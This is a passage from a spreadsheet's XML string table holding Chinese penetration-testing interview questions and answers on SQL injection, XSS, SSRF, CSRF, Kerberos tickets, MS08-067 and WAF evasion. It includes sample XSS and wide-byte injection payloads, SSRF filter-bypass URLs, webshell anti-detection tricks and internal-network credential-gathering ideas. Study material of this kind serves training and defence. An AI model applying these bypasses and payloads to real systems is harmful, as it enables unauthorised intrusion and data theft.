    编写正确的代码是一件非常有意义但耗时的工作，特别像编写C语言那种具有容易出错倾向的程序（如：字符串的零结尾），这种风格是由于追求性能而忽视正确性的传统引起的。尽管花了很长的时间使得人们知道了如何编写安全的程序，具有安全漏洞的程序依旧出现。因此人们开发了一些工具和技术来帮助经验不足的程序员编写安全正确的程序。虽然这些工具帮助程序员开发更安全的程序，但是由于C语言的特点，这些工具不可能找出所有的缓冲区溢出漏洞。所以，侦错技术只能用来减少缓冲区溢出的可能，并不能完全地消除它的存在。除非程序员能保证他的程序万无一失，否则还是要用到以下部分的内容来保证程序的可靠性能。
   2、通过操作系统使得缓冲区不可执行，从而阻止攻击者殖入攻击代码；
    这种方法有效地阻止了很多缓冲区溢出的攻击，但是攻击者并不一定要殖入攻击代码来实现缓冲区溢出的攻击，所以这种方法还是存在很多弱点的。
   3、利用编译器的边界检查来实现缓冲区的保护；
    这个方法使得缓冲区溢出不可能出现，从而完全消除了缓冲区溢出的威胁，但是相对而言代价比较大。
   4、在程序指针失效前进行完整性检查；
     这样虽然这种方法不能使得所有的缓冲区溢出失效，但它的确确阻止了绝大多数的缓冲区溢出攻击，而能够逃脱这种方法保护的缓冲区溢出也很难实现。</t>
  </si>
  <si>
    <t>进程和线程</t>
  </si>
  <si>
    <t xml:space="preserve">   进程是操作系统分配资源的最小单元, 线程是操作系统调度的最小单元。
   1、线程在进程下行进；
   2、一个进程可以包含多个线程不同进程间数据很难共享；
   3、同一进程下不同线程间数据很易共享；
   4、进程要比线程消耗更多的计算机资源；
   5、进程间不会相互影响，一个线程挂掉将导致整个进程挂掉；
   6、进程可以拓展到多机，进程最多适合多核；
   7、进程使用的内存地址可以上锁，即一个线程使用某些共享内存时，其他线程必须等它结束，才能使用这一块内存。（－"互斥锁"进程使用的内存地址可以限定使用量。
   一个应用程序至少包括 1 个进程，而 1 个进程包括 1 个或多个线程，
   每个进程在执行过程中拥有独立的内存单元，线程在执行过程中共享内存。</t>
  </si>
  <si>
    <t>MS08-067 漏洞原理分析</t>
  </si>
  <si>
    <t xml:space="preserve">   445 端口，SMB 网络服务和 MSRPC 网络服务相关。通过MSRPC over SMB通道调用Server服务程序中的NetPathCanonicalize函数时触发的，而NetPathCanonicalize函数在远程访问其他主机时，会调用NetpwPathCanonicalize函数，对远程访问的路径进行规范化，而在NetpwPathCanonicalize函数中存在的逻辑错误，造成栈缓冲区可被溢出，而获得远程代码执行（Remote Code Execution）。所谓路径规范化，就是将路径字符串中的【/】转换为【\】，同时去除相对路径【.\】和【..\】。如：
**/*/./**   =&gt;  **\*\**
**\*\..\**  =&gt;  **\**
在路径规范化的操作中，服务程序对路径字符串的地址空间检查存在逻辑漏洞。攻击者通过精心设计输入路径，可以在函数去除【..\】字符串时，把路径字符串中内容复制到路径串之前的地址空间中（低地址），达到覆盖函数返回地址，执行任意代码的目的。</t>
  </si>
  <si>
    <t>http 代理</t>
  </si>
  <si>
    <t>HTTP 代理存在两种形式：
普通代理：这种代理扮演中间人角色，对于连接到它的客户端来说，它是服务端；对于要连接的服务端来说，它是客户端。它就负责在两端之间来回传送 HTTP 报文。 类似 burp
隧道代理，它通过 HTTP 协议正文部分（Body）完成通讯，以 HTTP 的方式实现任意基于 TCP 的应用层协议代理：HTTP 客户端通过CONNECT 方法请求隧道代理创建一条到达任意目的服务器和端口的 TCP 连接，并对客户端和服务器之间的后继数据进行盲转发。类似机场节点</t>
  </si>
  <si>
    <t>MySQL 4.1/5.0/5.5 各版本的主要区别？</t>
  </si>
  <si>
    <t xml:space="preserve">4.1 增加了子查询的支持，字符集增加UTF-8，GROUP BY语句增加了ROLLUP，mysql.user表采用了更好的加密算法。 
5.0 增加了Stored procedures、Views、Cursors、Triggers、XA transactions的支持，增加了 INFORATION_SCHEMA 系统数据库 
5.5 默认存储引擎更改为 InnoDB、引入了一种新的性能架构 P_S，用于 mysql 监控服务 器运行时的性能，提高性能和可扩展性 :
a. 提高了默认线程并发数(innodb_thread_concurrency) 
b. 后台输入/输出线程控制（innodb_read_io_threads、innodb_write_io_threads） 
c. 主线程输入/输出速率控制（innodb_io_capacity） 
d.  操作系统内存分配程序使用控制(innodb_use_sys_malloc) 
e.   适应性散列索引(Hash Index)控制，用户可以关闭适应性散列功能。 
f.   插入缓冲（Insert Buffering）控制，用户可以关闭innodb的插入缓冲功能。 
g.  通过快速加锁算法提高可扩展性，innodb不在使用代理(posix)线程,而是使用原生的独立操作来完成互斥和读写锁定。 
h.  恢复组提交（Restored Group Commit） 
i.   提高恢复性能 
j.  多缓冲池实例 
k.  多个回滚段（Multiple Rollback Segments）,之前的innodb版本最大能处理1023个并发处理操作，现在mysql5.5可以处理高达128K的并发事物， 
l.   Linux系统固有的异步输入/输出，mysql5.5数据库系统也提高了linux系统的输入输出请求的并发数。 
m. 扩展变化缓冲：添加了删除缓冲和清除缓冲 
n.  改善了日志系统互斥和单独刷新（Flush）列表互斥 
o.  改善清除程序进度，在mysql5.5中清楚操作线程是独立的线程，并支持并发，可以使用innodb_purge_treads配置。 
p.  改善事务处理中的元数据锁定。例如，事物中一个语句需要锁一个表，会在事物结束时释放这个表，而不是像以前在语句结束时释放表。 </t>
  </si>
  <si>
    <t>什么是 CRLF 注入攻击？（%0d%0a）（\r\n）</t>
  </si>
  <si>
    <t>是一种当用户将回车换行字符插入到应用中而触发漏洞的攻击技巧。
当该字符与 HTTP 协议请求和响应的头部一起联用时就有可能会出现各种各样的漏洞，
包括 http 请求走私和 http 响应拆分。
http 请求走私：
缓存毒化—攻击者可以修改缓存中的内容然后不显示正常页面而显示恶意页面。
防火墙逃逸—攻击者通过构造数据包来逃避安全检查（两个包），通常会利用 CRLF 和构
造超大的数据包。
请求劫持—攻击者可以通过该利用获取 HttpOnly 的 cookie 和 http 认证数据，类似于
xss 但是不需要攻击者和黑客进行交互。
http 响应拆分：加入一些请求头，造成类似 XSS 的攻击效果</t>
  </si>
  <si>
    <t>内网黄金票据、白银票据的区别和利用方式</t>
  </si>
  <si>
    <t>（1）白银票据：抓取到了域控服务 hash 的情况下，在客户端以一个普通域用户的身份生成 TGS 票据，并且是针对于某个机器上的某个服务的，生成的白银票据,只能访问指定的 target 机器中指定的服务。
（2）黄金票据：直接抓取域控中账号的 hash，在客户端生成一个 TGT 票据，那么该票据是针对所有机器的所有服务,一旦攻击者拥有管理员访问域控制器的权限，就可以使用Mimikatz来提取KRBTGT帐户密码哈希值</t>
  </si>
  <si>
    <t>预编译能否 100%防 sql 注入？ 不能</t>
  </si>
  <si>
    <t>预编译原理： 先将查询语句固定 通过函数将传参变为字符串 拼接字符串去执行 你的关键字根本不会当作关键字去执行 $pdo-&gt;query(‘SET NAMES gbk’); $var = “\xbf\x27 OR 1=1 /“; $query = ‘SELECT FROM test WHERE name = ? LIMIT 1’; $stmt = $pdo-&gt;prepare($query); $stmt-&gt;execute(array($var)); 类似于宽字节注入</t>
  </si>
  <si>
    <t>reverse_tcp 和 bind_tcp 的区别？</t>
  </si>
  <si>
    <t>（1）reverse_tcp 木马会主动连接目标服务器 测试机主动连接攻击机
（2）bind_tcp 木马会监听本地的端口 攻击机主动连接测试机
采用 reverse 的方法一般较为安全，因为是在测试机连接攻击机，所以一般不会被防火墙发现；而 bind 在测试机打开端口时很容易被安全软件和防火墙发现</t>
  </si>
  <si>
    <t>谈谈对安全的理解</t>
  </si>
  <si>
    <t>互联网的发展便捷了生活，也带来了安全问题
安全是相对的，打破安全壁垒的代价如果高于安全保护的价值，就可以说是安全的
渗透测试中安全的本质是一种信任机制，是否每次都对用户发来的请求做安全验证
安全是一群不走寻常路、不按常规出牌的人摸索出来的
攻防相互促进（漏洞填堵、绕过）</t>
  </si>
  <si>
    <t>CMS 指纹规则</t>
  </si>
  <si>
    <t>Website 官方网站
JS 文件
Headers 匹配的请求头信息
Cookies 匹配的 cookies 字段
Version 版本信息
Product 产品名称匹配
Meta 特征
URI 特征</t>
  </si>
  <si>
    <t>如何保护 dom 不被修改 防止 dom xss</t>
  </si>
  <si>
    <t>浏览器写入页面渲染前先转义，不要使用 eval 函数处理不可控的外部数据 JS 中使用 filter.js 库 filter.js 由一系列针对常见业务场景下造成 DOM XSS 的恶意数据开展过滤的函数组成。</t>
  </si>
  <si>
    <t>python 爬虫的常见问题</t>
  </si>
  <si>
    <t>爬虫常用模块：requests、BeautifulSoup、lxml、re、xpath、selenium、
数据存储、txt/csv/mysql
Selenium（无界面浏览器）突破 JS 加密
传统爬虫多线程 现在提倡异步 IO 协程 异步 IO 模块主要有 aiohttp、aiomysql、asyncio
推荐的爬虫策略：爬取之后写入数据库，单独写提取、过滤办法 防止需求改了重新爬取
网络池解决增量爬取、断点续爬、去重
GIL 全局解释器锁 为保证线程安全的资源锁</t>
  </si>
  <si>
    <t>IDS/IPS 防护原理及绕过思路</t>
  </si>
  <si>
    <t>IDS 工作在网络层，旁路部署，通过抓取和分析网络流量来发现攻击；
IPS 一般也是在网络层旁路，可以理解为具备阻断能力的 IDS，是 IDS 的升级版（也有IDS 检测到攻击通知阻断设备执行阻断动作的设备联动模式），可以覆盖网络层和应用层；
WAF 是在应用层防护 Web 攻击的程序，一般是跟 Web 接入层对接，可旁路可串行，仅能覆盖应用层绕过：
1、TCP 分片重组
2、IP 分片 Python 下的组件 Scapy
3、伪造 TCP 状态
4、IPv6 正在服役的 IDS/IPS/WAF 不一定支持</t>
  </si>
  <si>
    <t>运营商（或其他）网络劫持</t>
  </si>
  <si>
    <t>本地劫持：魔改浏览器（hao123）
网络劫持：运营商劫持（数据包注入广告劫持代码）、cdn 缓存污染（CDN 服务器中的关键 JS 文件被污染注入）、DNS 劫持（路由器漏洞）</t>
  </si>
  <si>
    <t>红蓝对抗中蓝队反杀红队场景和姿势？</t>
  </si>
  <si>
    <t>蚁剑反杀 rce、蜜罐、宏病毒诱饵、whois 、域名反查、探测端口，服务，进行反渗透vp</t>
  </si>
  <si>
    <t>验证码相关利用点</t>
  </si>
  <si>
    <t>1、验证码可重用 （特定账户暴力破解、CSRF）
2、验证码可识别 （特定账户暴力破解）
3、验证码在客户端生成、显示、校验 （特定账户暴力破解、CSRF）
4、空验证码绕过 （特定账户暴力破解、CSRF）
5、验证码数量有限 （特定账户暴力破解）
6、是否校验客户端可控 （特定账户暴力破解、CSRF）
7、验证码可预测 （特定账户暴力破解）
8、错误超过一定次数才开启验证码 （撞库）</t>
  </si>
  <si>
    <t>为什么 aspx 木马权限比 asp 大？</t>
  </si>
  <si>
    <t>aspx 使用的是.net 技术。IIS 中默认不支持，ASP 只是脚本语言而已。入侵的时候 asp的木马一般是 guest 权限…APSX 的木马一般是 users 权限。</t>
  </si>
  <si>
    <t>内网服务器，如何进行信息收集？</t>
  </si>
  <si>
    <t>（1）手动，用一些小工具（批量看存活）
new user /domain 查域、net view 看共享、hosts 文件内网 ip 域名映射、wifi 记录和密
码、浏览器中的密码、敏感文件、各类服务的配置文件中信息、历史命令、ssh 私钥、
FTP 的连接信息、xshell 等 ssh 连接工具的 session 文件，3389 连接历史和被连接历史
信息、某些内网 api 接口未授权访问
（2）扫描器
主机扫描、端口扫描、漏洞扫描、识别内网环境、密码爆破、抓密码
（3）留后门，抓信息</t>
  </si>
  <si>
    <t>只有一个登录页面有哪些思路</t>
  </si>
  <si>
    <t>SQL注入、万能密码、明文传输/用户名可枚举/爆破弱口令、JS 里面的敏感信息（接口未授权访问）、密码找回、敏感目录，注册后尝试越权（或者进入系统后再看看）</t>
  </si>
  <si>
    <t>token 和 referer 做横向对比，谁安全等级高？</t>
  </si>
  <si>
    <t>token 安全等级更高，因为并不是任何服务器都可以取得 referer，如果从 HTTPS 跳到
HTTP，也不会发送 referer。并且 FLASH 一些版本中可以自定义 referer。但是 token 的
话，要保证其足够随机且不可泄露。(不可预测性原则)
对 referer 的验证，从什么角度去做？如果做，怎么杜绝问题
空 referer，referer 正则过滤不完善。
针对 token，对 token 测试会注意哪方面内容，会对 token 的哪方面进行测试？
重放、分析加密规则、结合信息泄露缓存日志替换越权</t>
  </si>
  <si>
    <t>栅栏密码</t>
  </si>
  <si>
    <t>把要加密的明文分成 N 个一组，然后把每组的第 1 个字连起来，形成一段无规律的话。
不过栅栏密码本身有一个潜规则，就是组成栅栏的字母一般不会太多。
凯撒密码是栅栏密码的一种</t>
  </si>
  <si>
    <t>防火墙，waf，ips，ids，终端准入，网页防篡改，规范开发代码，关闭危险服务例如 SMB，
RDP，数据库端口不对互联网访问等，发现异常入侵可在防火墙封禁 ip，或者是查看日
志。</t>
  </si>
  <si>
    <t>cookie 响应消息头的 secure 和 HttpOnly 分别作用是什么？</t>
  </si>
  <si>
    <t>secure:在 Cookie 中标记该变量，表明只有当浏览器和 web server 之间的通信协议为加
密认证协议时，浏览器才向服务器提交响应的 Cookie。
Httponly：禁止 Javascript 读取（防 XSS）</t>
  </si>
  <si>
    <t>如何生成一个安全的随机数？</t>
  </si>
  <si>
    <t>通过一些物理系统生成随机数，如电压的波动、磁盘磁头读/写时的寻道时间、空中电
磁波的噪声等。</t>
  </si>
  <si>
    <t>你平时用的比较多的漏洞是哪些？相关漏洞的原理？以及对应漏洞的修复方案？</t>
  </si>
  <si>
    <t>漏洞: ①文件包含漏洞 ②文件上传漏洞 ③sql注入漏洞
原理: ①引入一段用户能控制的脚本或代码，并让服务器执行
      ②用户上传了一个可执行的脚本文件，并通过该文件获得了执行服务端命令的权限
      ③a. SQL（结构化语句查询）
        b. 提交参数（调用数据库查询）的地方是用户可控的，并未做任何过滤处理
        c. 数字型，字符型，搜索型，POST注入，Cookie注入，延时注入，盲注等
修复方案：①设置白名单；指定访问一定的路径，再将参数拼接到路径当中
          ②上传文件的存储目录禁用执行权限；使用随机数改写文件名和文件路径
          ③利用ascii码值限制输入字符；转译特殊字符；使用参数化的预编译查询语句</t>
  </si>
  <si>
    <t>你平时使用哪些工具?以及对应工具的特点?</t>
  </si>
  <si>
    <t>工具：a.菜刀  b.Burpsuit
特点：a.1.拥有强大的管理功能
        2.服务端很小，是典型的一句话木马
        3.大多数杀毒软件无法检测
        4.在浏览器不会产生任何客户端代码
      b.1.可以对发送的数据包进行编码和解码
        2.Intruder工具种可以使用预先定义的一个列表来尝试某几个参数——在XSS测试与SQL注入测试中尤其有用
        3.可以使用爬虫</t>
  </si>
  <si>
    <t>如果遇到waf的情况下如何进行SQL注入/上传Webshell怎么做？</t>
  </si>
  <si>
    <t xml:space="preserve">     SQL    ：1.大小写混合  2.替换关键字  3.使用编码  4.使用注释  5.等价函数与命令  6.特殊符号
  Webshell  ：1.可以通过多次使用&amp;来引用前一个变量，通过一连串的赋值操作最后将要执行的内容与反引号拼接后传入eval实现免杀
              2.可以定义一个变量$do并为其赋值为todo,之后将木马内容赋值给可变变量$$do,最后在调用eval函数执行时将执行对象定义为$todo
              3.利用HTTP请求头
              4.加密
              5.利用HTTP请求头传入命令执行
</t>
  </si>
  <si>
    <t>谈谈Windows系统与Linux系统提权的思路？</t>
  </si>
  <si>
    <t>Windows：  1.systeminfo收集补丁信息  2.对比补丁编号，寻找可用exp  3.将合适的exp上传到服务器  4.使用exp进行提权，执行系统命令
Linux  ：. 1.检查漏洞系统的操作系统发行版  2.查看内核版本  3.检查可用的用户及当前用户的权限 
           4.列出SUID文件  5.查看安装的包、程序、运行的服务,过时的版本可能存在漏洞</t>
  </si>
  <si>
    <t>列举出您所知道的所有开源组件高危漏洞</t>
  </si>
  <si>
    <t>描述一个你深入研究过的 CVE 或 POC</t>
  </si>
  <si>
    <t>php/java反序列化漏洞的原理?解决方案?</t>
  </si>
  <si>
    <t>原理：    php.程序没有对用户输入的反序列化字符串进行检测，导致反序列化过程可以被恶意控制，进而造成代码执行、getshell等一系列不可控的后果
         java.如果Java应用对用户输入，即不可信数据做了反序列化处理，那么攻击者可以通过构造恶意输入，让反序列化产生非预期的对象，非预期的对象在产生过程中就有可能带来任意代码执行
解决方案： php.不要把用户的输入或者是用户可控的参数直接放进反序列化的操作中去
          java.1.通过Hook resolveClass来校验反序列化的类  2.使用ObjectInputFilter来校验反序列化的类  3.黑名单校验修复</t>
  </si>
  <si>
    <t>如果一台服务器被入侵后,你会如何做应急响应?</t>
  </si>
  <si>
    <t>1.网络隔离  2.反向推理  3.建立应急手册  4.甄别木马程序</t>
  </si>
  <si>
    <t>介绍 SQL 注入漏洞成因，如何防范？注入方式有哪些？除了数据库数据，利用方式还有哪些？</t>
  </si>
  <si>
    <t xml:space="preserve"> 成因：程序开发过程中不注意规范书写sql语句和对特殊字符进行过滤，导致客户端可以通过全局变量POST和GET提交一些sql语句正常执行
   防范：利用ascii码值限制输入字符；转译特殊字符；使用参数化的预编译查询语句
注入方式：最基础的注入-union注入攻击
          Boolean注入攻击-布尔盲注
          报错注入攻击
          时间注入攻击-时间盲注
          堆叠查询注入攻击
          二次注入攻击
          宽字节注入攻击
          base64注入攻击
          cookie注入攻击-http请求头参数注入
          XFF注入攻击-http请求头参数注入
          知道绝对路径的注入
利用方式：Union注入
         盲注 （分为延时盲注和布尔盲注）
         报错注入
         堆叠查询
         宽字节注入
         HTTP参数污染注入</t>
  </si>
  <si>
    <t>常见的中间件解析漏洞利用方式</t>
  </si>
  <si>
    <t>Windows、Linux、数据库的加固降权思路</t>
  </si>
  <si>
    <t>如何绕过CDN获取目标网站真实IP，谈谈你的思路</t>
  </si>
  <si>
    <t xml:space="preserve">如果给你一个网站,你的渗透测试思路是什么? </t>
  </si>
  <si>
    <t>渗透中首先要对目标进行信息收集；
收集例如使用的脚本中间件的类型版本开发端口等情况（使用工具：whatweb、nmap、站长工具等）；
对系统开发商进行分析（例如：首页底部的技术支持：xxxxxx）
对系统使用的cms进行分析（一般通过：御剑1.5、北极熊扫描器、robots.txt文件识别、cookie识别等方法）；
可通过暴力枚举扫描器进行敏感目录文件的探测（一般利用：御剑等类似 或者写一个简单的脚本文件，主要通过字典的方式进行扫描，burp也可以实现）；
可以的话通过扫描软件发现常规漏洞（例如：AWVS、wwwscan、appscan、北极熊扫描器）；
如果知道特定的版本的cms，或者知道使用的cms名称可通过互联网进行漏洞搜索根据网络爆出的漏洞进行测试。
发现漏洞后通过对漏洞的分析，然后深度利用达到攻击效果（常用的攻击工具：sqlmap、xss平台、各种漏洞的exp、cookie编辑插件、漏洞攻击脚本）；
例如通过sqlmap深度利用获取管理员的账号密码（密码一般为加密值，可通过解密网站进行解密再利用例如：www.cmd5.com）；
通过前期敏感地址的收集进行管理员登陆；（因为管理员功能较多容易出现漏洞，如果普通用户展示页面也存在相关漏洞进行利用即可）；
登陆后根据功能测试：获取shell（获取shell方法很多，本着把可执行脚本以文件形式写入或者传入或以其他形式存储在服务端可被用户访问的目录中即可。）；
通过shell进行服务器权限的控制（常见方法：添加超级管理员、读hash值getpass等），shell脚本一般情况下继承中间件的权限，若权限较低则进行提权操作；
通过sa用户提权、可执行脚本提权（例如asp的网站asp脚本权限低但发现可以执行php脚本为高权限）、serv-u提权、查看系统版本和补丁情况查找可提权的EXP提权；
若进行了端口限制不能远程连接，则可进行端口转发操作进行连接。
登陆后可进行内网渗透、嗅探等一些列操作渗透同机房甚至同C段、B段主机</t>
  </si>
  <si>
    <t>你实际的渗透测试经历等等</t>
  </si>
  <si>
    <t>SSRF漏洞的成因 防御 绕过？</t>
  </si>
  <si>
    <t xml:space="preserve">成因：于服务端提供了从其他服务器应用获取数据的功能，且没有对目标地址进行过滤和限制
防御：将回显的报错信息进行统一，或者采用报错不回显，防止用户可以报错信息判断远端服务器的端口状态。
     限制请求的端口只能为web端口，禁用类似于file、gopher等不需要的协议，只允许访问http和https的请求，其中常用的端口有：80,443,8080……
     采用黑名单机制，限制不能访问内网的IP地址，防止应用被用来获取内网信息而对内网进行攻击
     屏蔽返回的详细信息，或者过滤返回信息，验证远程服务器对请求的响应，例如：如果web应用是去获取某一种类型的文件，那么在把返回结果展示给用户之前，先验证返回的信息是否符合标准
绕过：利用@：http://example@127.0.0.1  
      例如：http://www.baidu.com@10.10.10.10与http://10.10.10.10 请求是相同的
      添加端口号：http://127.0.0.1:8080
      利用短地址：http://dwz.cn/11SMa
      ip 地址进制转换：以192.168.109.150为例
      首先，转换为十六进制：c0.a8.6d.96
      接着，转换为八进制：300.250.155.226
      即192.168.109.150 = 300250155226    访问：http://00300250155226
      可以指向任意ip的域名：xip.io
</t>
  </si>
  <si>
    <t>有哪些反向代理的工具，有没有实际的内网渗透经历？</t>
  </si>
  <si>
    <t>发现 test.jsp?cid=150 注入点，你有哪几种思路获取 webshell?</t>
  </si>
  <si>
    <t>以下链接存在 SQL注入漏洞，对于这个变形注入，你有什么思路？</t>
  </si>
  <si>
    <t>1、知道站点物理路径
2、有足够大的权限（可以用select …. from mysql.user测试）
3、magic_quotes_gpc()=OFF</t>
  </si>
  <si>
    <t>Mysql的网站注入，5.0以上和5.0以下有什么区别？</t>
  </si>
  <si>
    <t>5.0以下没有information_schema这个系统表，无法列表名等，只能暴力跑表名。
5.0以下是多用户单操作，5.0以上是多用户多操做。</t>
  </si>
  <si>
    <t>sqlmap如何对一个注入点注入，sqlmap如何注入一个post的包?</t>
  </si>
  <si>
    <t>你都了解哪些SQL注入的bypass技巧?</t>
  </si>
  <si>
    <t xml:space="preserve">1.在SQL注入时当空格被过滤了，在MySQL中可以使用：%09%0A %0B %0C %0D %A0 %20 /**/
2.经常在SQL注入时使用一些特殊符号即可绕过很多WAF规则，比如~， !， ``， @``， {x key}， 1.1， 1e1， ()， emoji表情符号， @:=等，在实际场景中将这些符号灵活应用就可以绕过很多WAF
3.经常在通过盲注获取数据时需要使用MySQL自带函数，比如substring()等这些处理字符串的函数，但是如果WAF过滤了()时，这些函数就无法使用了导致无法猜测数据，这时可以使用like或者regexp获取数据4.过滤逗号了可以使用join；5.过滤了空格使用其他空白符；6.过滤了关键字可以使用编码结合注释；7.过滤常用函数可以找非常用函数代替等等。
</t>
  </si>
  <si>
    <t>SQL 注入产生的原因：程序开发过程中不注意规范书写 sql 语句和对特殊字符进行过滤，导致客户端可以通过全局变量 POST 和 GET 
提交一些 sql 语句正常执行。
防止 SQL 注入的方式：1.开启配置文件中的 magic_quotes_gpc 和 magic_quotes_runtime 设置2.执行 sql 语句时使用 addslashes 进行 sql 语句转换3.Sql 语句书写尽量不要省略双引号和单引号。4.过滤掉 sql 语句中的一些关键词：update、insert、delete、select、 * 。5.提高数据库表和字段的命名技巧，对一些重要的字段根据程序的特点命名，取不易被猜到的。
注入方式：布尔盲注、时间盲注、报错注入、堆叠注入</t>
  </si>
  <si>
    <t>宽字符注入的原理？如何利用宽字符注入漏洞，payload如何构造及修复方案？</t>
  </si>
  <si>
    <t xml:space="preserve">宽字符：用多个字节来代表的字符，如：Unicode编码
（1）%27 ’
（2）%20 空格
（3）’%23 #
（4）%df 運（说明,也可以是其他的%d1之类，解析之后变成中文字符）
宽字符的注入原理：sql语句进后端后对单引号等进行了转义，转义\为%5C，当前面的%xx与%5C能结合成两个字节的字符时候，就可以使后面的单引号逃逸，从而造成注入。
</t>
  </si>
  <si>
    <t>如何判断SQL注入，有哪些方法，说说你最常用的?</t>
  </si>
  <si>
    <t>https://www.cnblogs.com/xp0813/p/11410746.html</t>
  </si>
  <si>
    <t>如何设置可以跨域请求数据？jsonp是做什么的？</t>
  </si>
  <si>
    <t>如果子域名和顶级域名不同源，在哪里可以设置叫他们同源，解释一下什么是同源策略？</t>
  </si>
  <si>
    <t>同源策略，哪些东西是同源可以获取到的？</t>
  </si>
  <si>
    <t>JSON和JSONP的区别？</t>
  </si>
  <si>
    <t>（1）、定义不同
JSON是一bai种基于文本的数据交换方式（不支持跨域），而JSONP是一种非官方跨域数据交互协议。
（2）、核心不同
json的核心是通过XmlHttpRequest获取非本页内容，而jsonp的核心则是动态添加&lt;script&gt;标签来调用服务器提供的js脚本。</t>
  </si>
  <si>
    <t>JSONP劫持利用方式及修复方案？</t>
  </si>
  <si>
    <t>jsonp是一个非官方的协议，利用script元素的开放策略，网页可以得到从其他来源动态产生的json数据，因此可以用来实现跨域。
解决方法：1、验证 HTTP Referer 头信息；
2、在请求中添加 csrfToken 并在后端进行验证；</t>
  </si>
  <si>
    <t>JSON注入如何利用？</t>
  </si>
  <si>
    <t>恶意用于向json字符串中注入恶意字符，导致解析失败或非正常的解析</t>
  </si>
  <si>
    <t>Ajax是否遵循同源策略？</t>
  </si>
  <si>
    <t>遵循</t>
  </si>
  <si>
    <t>CSP是什么？如何设置CSP？</t>
  </si>
  <si>
    <t>CSP：Content Security Policy，内容安全策略。是防御XSS攻击的一种安全机制，其思想是以服务器白名单的形式来配置可信的内容
来源，客户端Web应用代码可以使用这些安全来源。</t>
  </si>
  <si>
    <t>不同浏览器之间，安全策略有哪些不同，比如chrome，firefox，IE</t>
  </si>
  <si>
    <t>说说HTML5有哪些新的安全特性？</t>
  </si>
  <si>
    <t>iframe沙箱：HTML5为iframe元素增加了sandbox属性防止不信任的Web页面执行某些操作。
CSP内容安全策略：XSS通过虚假内容和诱骗点击来绕过同源策略。
XSS过滤器：Chrome、Safari这样的现代浏览器也构建了安全防御措施，在前端提供了XSS过滤器。</t>
  </si>
  <si>
    <t>如何防范 XSS 漏洞，在前端如何做，在后端如何做，哪里更好，为什么？</t>
  </si>
  <si>
    <t>1.对前端输入做过滤和编码：
比如只允许输入指定类型的字符，比如电话号格式，注册用户名限制等，输入检查需要在服务器端完成，在前端完成的限制是容易绕过的；
对特殊字符进行过滤和转义；
2.对输出做过滤和编码：在变量值输出到前端的HTML时进行编码和转义；
3.给关键cookie使用http-only</t>
  </si>
  <si>
    <t>黑盒如何检测XSS漏洞？</t>
  </si>
  <si>
    <t>如果给你一个XSS盲打漏洞，但是返回来的信息显示，他的后台是在内网，并且只能使用内网访问，那么你怎么利用这个XSS？</t>
  </si>
  <si>
    <t>一个公网IP、内网的目标浏览器
首先，利用XSS盲打漏洞中招(内网的目标浏览器访问网站的流量都会被定向到公网IP)，此时对内网IP实施ARP攻击，在结合metasploit模块进行漏洞利用。</t>
  </si>
  <si>
    <t>如果叫你来防御蠕虫，你有哪些方法？</t>
  </si>
  <si>
    <t>1、将本地带有破坏性的程序改名字。
2、关闭可执行文件。
3、禁止“FileSystemObject”就可以有效的控制VBS病毒的传播。具体操作方法：用regsvr32 scrrun.dll /u这条命令就可以禁止文件系统对象。
4、开启浏览器的安全设置。</t>
  </si>
  <si>
    <t>在社交类的网站中，哪些地方可能会出现蠕虫？</t>
  </si>
  <si>
    <t>留言版
评论
文章发布
…</t>
  </si>
  <si>
    <t>XSS持久化？</t>
  </si>
  <si>
    <t>如果给你一个XSS漏洞，你还需要哪些条件可以构造一个蠕虫？</t>
  </si>
  <si>
    <t xml:space="preserve">1、构造一个具有自我复制的反射型XSS
2、插入评论、留言框
3、用户点击链接，链接内容指向同样的XSS向量。也就是注入了蠕虫代码的的存在存储型xss的页面。链接被点击后将继续造成蠕虫传播。
</t>
  </si>
  <si>
    <t>xss的发生场景？</t>
  </si>
  <si>
    <t>1. 在HTML中输出
例：&lt;div&gt;$var&lt;/div&gt;
        &lt;a href=#&gt;$var&lt;/a&gt;
在这种场景下，XSS的利用方式一般是构造一个&lt;script&gt;标签，或者是任何能够产生脚本执行的方式。
&lt;div&gt; &lt;script&gt;alert(/xss/)&lt;/script&gt;&lt;/div&gt;
&lt;a href=# &gt; &lt;img src=# οnerrοr=alert(1) /&gt;&lt;/a&gt;
2.在HTML属性中输出
例：&lt;div id="abc" name="$var" &gt;&lt;/div&gt;
灵活构造XSS PAYLOAD
&lt;div id="abc" name=""&gt;&lt;script&gt;alert(/xss/)&lt;/script&gt;&lt;"" &gt;&lt;/div&gt;
3.在&lt;script&gt;标签中输出
&lt;script&gt;
var x = "$var";
&lt;/script&gt;
攻击者需要先闭合引号才能实施XSS攻击
&lt;script&gt;
var x = "";alert(/xss/);//";
&lt;/script&gt;
4.在事件中输出
&lt;a href=# οnclick="funcA('$var')" &gt;test&lt;/a&gt;
可能的攻击方法
&lt;a href=# οnclick="funcA('');alert(/xss/);//')" &gt;test&lt;/a&gt;
5.在CSS中输出
6.在地址中输出
详情介绍链接地址：https://blog.csdn.net/hitwangpeng/article/details/45503465</t>
  </si>
  <si>
    <t>CSRF、SSRF和重放攻击有什么区别？</t>
  </si>
  <si>
    <t>CSRF(跨站请求伪造)是服务器端没有对用户提交的数据进行随机值校验，且对http请求包内的refer字段校验不严，导致攻击者可以利用用户的Cookie信息伪造用户请求发送至服务器。
SSRF(服务端请求伪造）是服务器对用户提供的可控URL过于信任，没有对攻击者提供的RUL进行地址限制和足够的检测，导致攻击者可以以此为跳板攻击内网或其他服务器。
重放攻击是将截获的数据包进行重放，达到身份认证等目的，是指攻击者发送一个目的主机已接收过的包，来达到欺骗系统的目的，主要用于身份认证过程，破坏认证的正确性。
简单说就是：
CSRF是跨站请求伪造攻击，由客户端发起， SSRF是服务器端请求伪造，由服务器发起， 重放攻击是将截获的数据包进行重放，达到身份认证等目的</t>
  </si>
  <si>
    <t>防御CSRF都有哪些方法，JAVA是如何防御CSRF漏洞的，token一定有用么？</t>
  </si>
  <si>
    <t>防御方法：https://blog.csdn.net/hitwangpeng/article/details/45532959
         https://tech.meituan.com/2018/10/11/fe-security-csrf.html
         https://blog.csdn.net/weixin_42728957/article/details/89327528
从java的方向防御：
https://www.shuzhiduo.com/A/6pdDOkRl5w/
token一定有用吗？
答： 不一定， 
token是什么以及为什么token不一定有用介绍网址：  https://blog.csdn.net/hitwangpeng/article/details/45532959</t>
  </si>
  <si>
    <t>CSRF漏洞的本质是什么？</t>
  </si>
  <si>
